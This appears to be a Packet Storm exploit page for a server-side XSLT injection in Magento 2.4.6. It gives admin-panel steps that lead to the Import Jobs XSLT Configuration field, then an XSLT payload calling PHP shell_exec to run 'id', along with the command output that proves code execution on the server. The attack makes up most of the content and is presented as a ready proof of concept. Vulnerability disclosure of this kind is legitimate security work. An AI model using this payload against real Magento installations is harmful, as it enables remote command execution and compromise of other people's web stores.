Magento 2.4.6 XSLT Server Side Injection ≈ Packet Storm

Magento 2.4.6 XSLT Server Side Injection ≈ Packet Storm

Home[1] Files[2] News[3] &[SERVICES_TAB] Contact[4] Add New[5]

Magento 2.4.6 XSLT Server Side Injection[6]
Authored by tmrswrr[7]

Magento version 2.4.6 XSLT server-side injection proof of concept exploit.

SHA-256 | ae81950e2fc15cf464a8175e05b574b8b5b2ed4aba982fabb1e7d86affd1d181

Change Mirror[11] Download[12]

        # Exploit Title: Magento ver. 2.4.6 - XSLT Server Side Injection
Date:** 2023-11-17
Exploit Author:** tmrswrr
Vendor Homepage:** [](
Software Link:** [Magento 2.4.6-p3](
Version:** 2.4.6
Tested on:** 2.4.6
## POC
1. Enter with admin credentials to this URL: [](
2. Click `SYSTEM > Import Jobs > Entity Type Widget > click edit`
3. Choose Import Source is File
4. Click `XSLT Configuration` and write this payload:
<?xml version="1.0" encoding="utf-8"?>
<xsl:stylesheet version="1.0"
<xsl:template match="/">
<xsl:value-of select="php:function('shell_exec','id')" />
**<?xml version="1.0"?>
**uid=10095(a0563af8) gid=1050(a0563af8) groups=1050(a0563af8)

Login[13] or Register[14] to add favorites

File Archive:

November 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa

File Tags

File Archives


packet storm

© 2022 Packet Storm. All rights reserved.

Security Services[119]
Hosting By

Pensée du jour :

Ce que l'homme a fait ,

l'homme peut le défaire.


"No secure path in the world"